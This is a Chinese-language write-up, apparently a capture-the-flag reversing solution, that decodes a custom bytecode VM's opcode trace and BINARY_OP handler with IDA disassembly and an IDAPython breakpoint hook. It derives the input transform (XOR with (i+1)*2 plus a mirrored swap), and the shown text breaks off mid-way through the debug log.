_LOAD_CONST sp=65535 0 4 9223372036854775804 127 144 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304362272 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 100 _BINARY_SUBSCR sp65535 8 140702510881792 9223372036854775804 127 65535 _STORE_NAME sp=65535 3 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 127 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304362416 112 _BINARY_SUBSCR sp65535 2147353472 140702510881792 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _STORE_SUBSCR sp=65535 8 140702510881776 9223372036854775804 2645304362416 65535 _LOAD_NAME sp=65535 3 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 2645304362416 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304362480 65535 _STORE_SUBSCR sp=65535 2147353472 140702510881776 9223372036854775804 2645304362416 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304362336 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 4 9223372036854775804 127 144 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304362400 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 100 _BINARY_SUBSCR sp65535 9 140702510881792 9223372036854775804 127 65535 _STORE_NAME sp=65535 3 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 127 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304362544 112 _BINARY_SUBSCR sp65535 2147353472 140702510881792 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _STORE_SUBSCR sp=65535 9 140702510881776 9223372036854775804 2645304362544 65535 _LOAD_NAME sp=65535 3 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 2645304362544 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304362608 65535 _STORE_SUBSCR sp=65535 2147353472 140702510881776 9223372036854775804 2645304362544 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304362464 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 4 9223372036854775804 127 144 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304362528 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 100 _BINARY_SUBSCR sp65535 10 140702510881792 9223372036854775804 127 65535 _STORE_NAME sp=65535 3 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 127 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304362672 112 _BINARY_SUBSCR sp65535 2147353472 140702510881792 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _STORE_SUBSCR sp=65535 10 140702510881776 9223372036854775804 2645304362672 65535 _LOAD_NAME sp=65535 3 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 2645304362672 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304362736 65535 _STORE_SUBSCR sp=65535 2147353472 140702510881776 9223372036854775804 2645304362672 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304362592 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 4 9223372036854775804 127 144 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304362656 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 100 _BINARY_SUBSCR sp65535 11 140702510881792 9223372036854775804 127 65535 _STORE_NAME sp=65535 3 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 127 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304362800 112 _BINARY_SUBSCR sp65535 2147353472 140702510881792 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _STORE_SUBSCR sp=65535 11 140702510881776 9223372036854775804 2645304362800 65535 _LOAD_NAME sp=65535 3 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 2645304362800 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304362864 65535 _STORE_SUBSCR sp=65535 2147353472 140702510881776 9223372036854775804 2645304362800 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304362720 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 4 9223372036854775804 127 144 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304362784 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 100 _BINARY_SUBSCR sp65535 12 140702510881792 9223372036854775804 127 65535 _STORE_NAME sp=65535 3 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 127 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304362928 112 _BINARY_SUBSCR sp65535 2147353472 140702510881792 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _STORE_SUBSCR sp=65535 12 140702510881776 9223372036854775804 2645304362928 65535 _LOAD_NAME sp=65535 3 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 2645304362928 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304362992 65535 _STORE_SUBSCR sp=65535 2147353472 140702510881776 9223372036854775804 2645304362928 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304362848 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 4 9223372036854775804 127 144 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304362912 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 100 _BINARY_SUBSCR sp65535 13 140702510881792 9223372036854775804 127 65535 _STORE_NAME sp=65535 3 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 127 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304363056 112 _BINARY_SUBSCR sp65535 2147353472 140702510881792 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _STORE_SUBSCR sp=65535 13 140702510881776 9223372036854775804 2645304363056 65535 _LOAD_NAME sp=65535 3 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 2645304363056 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304363120 65535 _STORE_SUBSCR sp=65535 2147353472 140702510881776 9223372036854775804 2645304363056 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304362976 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 4 9223372036854775804 127 144 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304363040 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 100 _BINARY_SUBSCR sp65535 14 140702510881792 9223372036854775804 127 65535 _STORE_NAME sp=65535 3 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 127 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304363184 112 _BINARY_SUBSCR sp65535 2147353472 140702510881792 9223372036854775804 127 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _STORE_SUBSCR sp=65535 14 140702510881776 9223372036854775804 2645304363184 65535 _LOAD_NAME sp=65535 3 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 127 65535 _LOAD_CONST sp=65535 0 5 9223372036854775804 9295712209692852480 65535 _LOAD_NAME sp=65535 2 140702510881680 140702510944352 2645304363184 65535 _BINARY_OP sp=65535 2 140702510881752 9223372036854775804 2645304363248 65535 _STORE_SUBSCR sp=65535 2147353472 140702510881776 9223372036854775804 2645304363184 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304363104 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 4 9223372036854775804 127 144 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304363168 65535 _LOAD_CONST sp=65535 0 2 9223372036854775804 2645304350576 65535 _STORE_NAME sp=65535 2 140702510881992 140702510944352 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 158 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304363232 65535 _LOAD_NAME sp=65535 0 140702510881680 1 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 166 _BINARY_SUBSCR sp65535 0 140702510881792 9223372036854775804 127 65535 _LOAD_NAME sp=65535 1 140702510881680 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 171 _BINARY_SUBSCR sp65535 0 140702510881792 9223372036854775804 2645304363312 172 _COMPARE_OP sp65535 3 140702510881936 9223372036854775804 2645304363232 65535 _LOAD_NAME sp=65535 2 140702510881680 0 2645304350576 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304363232 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 192 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304363296 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 166 _BINARY_SUBSCR sp65535 1 140702510881792 9223372036854775804 127 65535 _LOAD_NAME sp=65535 1 140702510881680 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 171 _BINARY_SUBSCR sp65535 1 140702510881792 9223372036854775804 2645304363376 172 _COMPARE_OP sp65535 3 140702510881936 9223372036854775804 2645304363296 </code></pre> <p>结合一下_BINARY_OP这个函数的汇编</p> <pre><code>text:00007FF7DB2E1A80 .text:00007FF7DB2E1A80 ; =============== S U B R O U T I N E ======================================= .text:00007FF7DB2E1A80 .text:00007FF7DB2E1A80 .text:00007FF7DB2E1A80 ; _QWORD *__fastcall BINARY_OP(unsigned int) .text:00007FF7DB2E1A80 public _BINARY_OP .text:00007FF7DB2E1A80 _BINARY_OP proc near ; CODE XREF: runner+90↓p .text:00007FF7DB2E1A80 ; DATA XREF: .pdata:00007FF7DB2EF114↓o .text:00007FF7DB2E1A80 push r13 .text:00007FF7DB2E1A82 push r12 .text:00007FF7DB2E1A84 push rbp .text:00007FF7DB2E1A85 push rdi .text:00007FF7DB2E1A86 push rsi .text:00007FF7DB2E1A87 push rbx .text:00007FF7DB2E1A88 sub rsp, 28h .text:00007FF7DB2E1A8C mov eax, cs:dword_7FF7DB2F1048 .text:00007FF7DB2E1A92 lea rsi, stack .text:00007FF7DB2E1A99 sub eax, 1 .text:00007FF7DB2E1A9C cdqe .text:00007FF7DB2E1A9E shl rax, 4 .text:00007FF7DB2E1AA2 mov ebp, ecx .text:00007FF7DB2E1AA4 mov rcx, [rsi+rax] ; Block .text:00007FF7DB2E1AA8 mov r12, [rcx] .text:00007FF7DB2E1AAB call free .text:00007FF7DB2E1AB0 mov eax, cs:dword_7FF7DB2F1048 .text:00007FF7DB2E1AB6 lea edx, [rax-1] .text:00007FF7DB2E1AB9 sub eax, 2 .text:00007FF7DB2E1ABC cdqe .text:00007FF7DB2E1ABE mov cs:dword_7FF7DB2F1048, edx .text:00007FF7DB2E1AC4 shl rax, 4 .text:00007FF7DB2E1AC8 mov rcx, [rsi+rax] ; Block .text:00007FF7DB2E1ACC mov r13, [rcx] .text:00007FF7DB2E1ACF call free .text:00007FF7DB2E1AD4 mov eax, cs:dword_7FF7DB2F1048 .text:00007FF7DB2E1ADA lea ebx, [rax-1] .text:00007FF7DB2E1ADD cmp ebp, 2 .text:00007FF7DB2E1AE0 jz short loc_7FF7DB2E1B40 .text:00007FF7DB2E1AE2 ja short loc_7FF7DB2E1B28 .text:00007FF7DB2E1AE4 mov rdi, r12 .text:00007FF7DB2E1AE7 add r12, r13 .text:00007FF7DB2E1AEA xor rdi, r13 .text:00007FF7DB2E1AED test ebp, ebp .text:00007FF7DB2E1AEF cmovz rdi, r12 .text:00007FF7DB2E1AF3 .text:00007FF7DB2E1AF3 loc_7FF7DB2E1AF3: ; CODE XREF: _BINARY_OP+AB↓j .text:00007FF7DB2E1AF3 ; _BINARY_OP+B4↓j ... .text:00007FF7DB2E1AF3 movsxd rbx, ebx .text:00007FF7DB2E1AF6 mov ecx, 8 ; Size .text:00007FF7DB2E1AFB call malloc .text:00007FF7DB2E1B00 shl rbx, 4 .text:00007FF7DB2E1B04 add rsi, rbx .text:00007FF7DB2E1B07 mov [rax], rdi .text:00007FF7DB2E1B0A mov [rsi], rax .text:00007FF7DB2E1B0D mov dword ptr [rsi+8], 0 .text:00007FF7DB2E1B14 add rsp, 28h .text:00007FF7DB2E1B18 pop rbx .text:00007FF7DB2E1B19 pop rsi .text:00007FF7DB2E1B1A pop rdi .text:00007FF7DB2E1B1B pop rbp .text:00007FF7DB2E1B1C pop r12 .text:00007FF7DB2E1B1E pop r13 .text:00007FF7DB2E1B20 retn .text:00007FF7DB2E1B20 ; --------------------------------------------------------------------------- .text:00007FF7DB2E1B21 align 8 .text:00007FF7DB2E1B28 .text:00007FF7DB2E1B28 loc_7FF7DB2E1B28: ; CODE XREF: _BINARY_OP+62↑j .text:00007FF7DB2E1B28 cmp ebp, 3 .text:00007FF7DB2E1B2B jnz short loc_7FF7DB2E1AF3 .text:00007FF7DB2E1B2D mov rdi, r12 .text:00007FF7DB2E1B30 imul rdi, r13 .text:00007FF7DB2E1B34 jmp short loc_7FF7DB2E1AF3 .text:00007FF7DB2E1B34 ; --------------------------------------------------------------------------- .text:00007FF7DB2E1B36 align 20h .text:00007FF7DB2E1B40 .text:00007FF7DB2E1B40 loc_7FF7DB2E1B40: ; CODE XREF: _BINARY_OP+60↑j .text:00007FF7DB2E1B40 mov rdi, r13 .text:00007FF7DB2E1B43 sub rdi, r12 .text:00007FF7DB2E1B46 jmp short loc_7FF7DB2E1AF3 .text:00007FF7DB2E1B46 _BINARY_OP endp </code></pre> <p>他会分别对op为0,1,2,3做分别处理</p> <pre><code>| op | 含义 | | -- | ----------- | | 0 | `a + b` | | 1 | `a ^ b` | | 2 | `b - a` | | 3 | `a * b` | </code></pre> <p>就比如这一段</p> <p>_LOAD_NAME 2:把变量 i 压栈</p> <p>_LOAD_CONST 1 + _BINARY_OP op=0:计算 i + 1</p> <p>_LOAD_CONST 3 + _BINARY_OP op=3:再乘一个常量(这个常量在 Consts[3] 里,实际就是 2),得到 (i+1)*2</p> <p>_BINARY_OP op=1:拿上一步结果去跟当前字符做异或 ^</p> <p>连起来就是</p> <pre><code>source[i] ^= (i + 1) * 2 </code></pre> <pre><code>65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351424 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304351488 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351552 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304351488 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304351552 </code></pre> <p>而这相当于一段完整的处理</p> <p>_SWAP + _STORE_SUBSCR,配合前后一次 _BINARY_SUBSCR 的模式,就是在交换 source[i] 和 source[29-i]</p> <p>trace 里你会发现这一段循环只跑了 15 次</p> <pre><code>65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351296 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304351360 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351424 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304351360 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304351424 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304351360 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304351296 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351152 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351216 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304351280 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 8 140702510881792 9223372036854775804 2645304351440 </code></pre> <p>当然如果你想更清晰的看到,可以用下面这个idapython</p> <pre><code>import ida_dbg import ida_kernwin EA_BINOP = 0x7FF7DB2E1A80 # _BINARY_OP 入口地址 EA_RESULT = 0x7FF7DB2E1AF3 # 写回结果的地方 class BinOpHook(ida_dbg.DBG_Hooks): def dbg_bpt(self, tid, ea): # 入口:打印操作码/opcode + 两个操作数 if ea == EA_BINOP: op = ida_dbg.get_reg_val("ecx") # 传进来的操作码 r12 = ida_dbg.get_reg_val("r12") # 第一个操作数 r13 = ida_dbg.get_reg_val("r13") # 第二个操作数 ida_kernwin.msg(f"[BINARY_OP ENTER] op={op} r12={r12} r13={r13}\n") return 0 # 继续执行 # 结果写回点:打印 rdi(结果) elif ea == EA_RESULT: result = ida_dbg.get_reg_val("rdi") ida_kernwin.msg(f"[BINARY_OP RESULT] rdi={result}\n") return 0 # 继续执行 return 0 # 装载 hook bHook = BinOpHook() bHook.hook() # 加断点 ida_dbg.add_bpt(EA_BINOP) ida_dbg.add_bpt(EA_RESULT) ida_kernwin.msg("[+] BINARY_OP hook installed.\n") </code></pre> <p>运行,然后F9一直在两个断点之间跳转,可以看到op值为0,1,2,3时的值,以下只展示一下部分</p> <pre><code>[BINARY_OP RESULT] rdi=1 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 //乘了2 [BINARY_OP RESULT] rdi=2 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 //1与2异或 [BINARY_OP RESULT] rdi=100 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=1 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=2 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=4 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=104 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=2 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=3 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=6 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=103 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=3 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=4 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=8 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=111 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=4 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=5 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=10 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=113 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=5 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=6 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=12 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=109 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=6 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=7 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=14 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=111 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=7 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=8 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=16 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=113 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=8 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=9 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=18 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=115 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=9 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=10 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=20 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=117 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=10 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=11 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=22 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=119 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=11 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=12 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=24 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=121 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=12 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=13 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=26 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=123 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=13 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=14 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=28 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=125 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=14 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=15 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=30 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=127 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=15 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=16 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] 